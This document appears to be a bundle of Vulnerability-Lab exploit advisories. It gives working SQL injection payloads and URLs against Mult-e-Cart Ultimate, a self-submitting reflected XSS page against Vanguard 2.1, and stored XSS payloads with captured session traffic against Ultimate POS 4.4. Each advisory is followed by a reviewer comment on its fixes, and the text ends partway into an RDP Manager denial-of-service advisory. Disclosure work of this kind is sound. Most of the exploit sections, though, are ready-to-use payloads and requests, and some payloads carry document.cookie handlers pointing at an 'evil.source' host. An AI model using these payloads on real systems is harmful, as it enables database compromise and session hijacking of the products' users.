Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system.
The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`,
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to
execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote
vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged
roles like admin.
Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t
PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
PoC: Exploit
<html>
<head><body>
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
<br>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
</body></head>
</html>
--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
-
Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...')
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
-
Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following description ...
1. Disable to display the sql errors for other users then the admin or pipe it into a local log file outside the panel ui
2. Use a prepared statement to protect the query against further injection attacks
3. Restrict the vulnerable id parameter to disallow usage of special chars of post and get method requests
4. Encode and escape the id content on get method request with the id parameter
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
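Review bot: the classification does not match the evidence: the text calls this a "classic order by sql-injection" and the first error log shows `order by 100--`, but every listed payload and PoC URL is a `union select` inject, so either the payload list or the description should be corrected. In the fix list, item 2 (prepared statements / bound parameters) is the change that removes the defect: the stack trace shows `findModel('-1'')` issuing `SELECT * FROM \`tbl_inventory\` WHERE id=-1'`, i.e. the raw `id` string is concatenated into the SQL, whereas a Yii 2 hash-format condition such as `['id' => $id]` binds the value as a parameter; items 3 and 4 (filtering or encoding special characters) are weaker than binding, and for an integer key a cast to int is the simpler form of item 3. Item 1 could be stated concretely: the absolute paths and full stack traces in the logs come from the framework's debug error page, which should be switched off (YII_DEBUG disabled) on a production deployment, with errors written to a server-side log instead.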

@ -0,0 +1,222 @@
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1
Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2283
Common Vulnerability Scoring System:
====================================
4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.
Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
session data or to manipulate application contents for clients.
The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
injection web vulnerability with non-persistent attack vector.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of affected application modules.
Request method(s):
[+] POST
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] phps_query
Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source: search
<div class="ui yellow basic segment"></div>
<div class="ui container" style="margin-top: -0.7em;">
<form method="POST" action="https://vanguard.squamifer.ovh/search">
<div class="ui action input fluid">
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
<div class="ui divider"></div>
<div class="ui cards aligned centered">
<div class="alert color blue-color"><div class="ui hidden divider"></div>
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
</div></div></div>
--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding
Exploitation: PoC
<html>
<head>
<title>PoC</title>
<style type="text/css">
#nodisplay {
display:none;
}
</style>
</head>
<body>
<div id="nodsiplay">
<form action="https://vanguard.localhost:8080/search" method="post">
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
</form>
</div>
<script>
function submitForm() {
document.forms[0].submit();
}
submitForm();
</script>
</body>
</html>
Security Risk:
==============
The security risk of the validation web vulnerability in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
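Review bot: the advisory has no "Solution - Fix & Patch" section, although the vulnerable source shows two reflection points that need context-aware encoding: `phps_query` is echoed inside the `value="..."` attribute of the search input (`<input name="phps_query" type="text" value=""><iframe ...`) and again as a text node in the "No results found for <strong>...</strong>" header, so the fix is HTML-encoding the parameter in both places (in PHP, htmlspecialchars with ENT_QUOTES covers the attribute context). The "Vulnerable Source: search" excerpt also carries `action="https://vanguard.squamifer.ovh/search"`, a hostname that differs from the `vanguard.localhost:8080` lab host used in the session log and PoC; it should be normalised to the lab host so the advisory does not point at a third-party instance. Minor: the Document Title calls the issue a "POST Inject Web Vulnerability" while the Exploit Title and Vulnerability Class call it cross-site scripting; one term throughout helps indexing.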

@ -0,0 +1,257 @@
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
# Version: 4.4
Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296
Release Date:
=============
2021-10-26
Vulnerability Laboratory ID (VL-ID):
====================================
2296
Common Vulnerability Scoring System:
====================================
5.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The Ultimate POS is a erp, stock management, point of sale & invoicing web-application.
The application uses a mysql database management system in combination with php 7.2.
(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )
Abstract Advisory Information:
==============================
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.
Affected Product(s):
====================
thewebfosters
Ultimate POS v4.4 - ERP (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent validation web vulnerability is located in the name parameter of the add products module.
Remote attackers with privileges as vendor to add products are able to inject own malicious script codes.
The request method to inject is post and the attack vector is persistent. Injects are possible via edit
or by a new create of a product.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks,
persistent external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Products (Add)
Vulnerable Input(s):
[+] Product Name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] Products List
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
test"><img src="evil.source" onload=alert(document.cookie)></img>
---- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly
---- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
Content-Length: 4064
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/23/edit
Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000/products
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly
Vulnerable Source: Products (list - name)
<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td>
<div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>
Reference(s):
https://pos-uf.localhost.com:8000/products/
https://pos-uf.localhost.com:8000/products/view/
https://pos-uf.localhost.com:8000/products/23/edit
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Restrict the input on product names to disallow special chars
2. Encode and filter the input transmitted via post in the name parameter
3. Escape and sanitize the output in the products listing of the backend
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
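Review bot: in the "Solution - Fix & Patch" section, step 1 (restrict product names to disallow special chars) is a blocklist that rejects legitimate names containing quotes or ampersands and still leaves the listing unsafe for any other field that reaches the same template; the control that actually closes the issue is step 3, contextual HTML encoding at the point of output, since the "Vulnerable Source" block shows the name landing unencoded inside `<td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>`. Suggest listing output encoding first and dropping step 1 or rewording it as length/format validation. Two smaller points on the PoC logs: the full `ultimate_pos_session` cookie values are printed and should be redacted even for a localhost instance, and both responses are recorded as `POST: HTTP/3.0 200 OK` together with a `location:` header, which is inconsistent (a redirect would carry a 3xx status), so the transcription should be checked.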


@ -0,0 +1,166 @@
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
# Software Link: https://www.cinspiration.de/download.html
# Version: 4.9.9.3
# Tested on: Linux
Document Title:
===============
RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2309
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2309
Common Vulnerability Scoring System:
====================================
3.6
Vulnerability Class:
====================
Denial of Service
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
if several connections are open.
(Copy of the Homepage: https://www.cinspiration.de/download.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client.
Vulnerability Disclosure Timeline:
==================================
2021-06-01: Researcher Notification & Coordination (Security Researcher)
2021-06-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
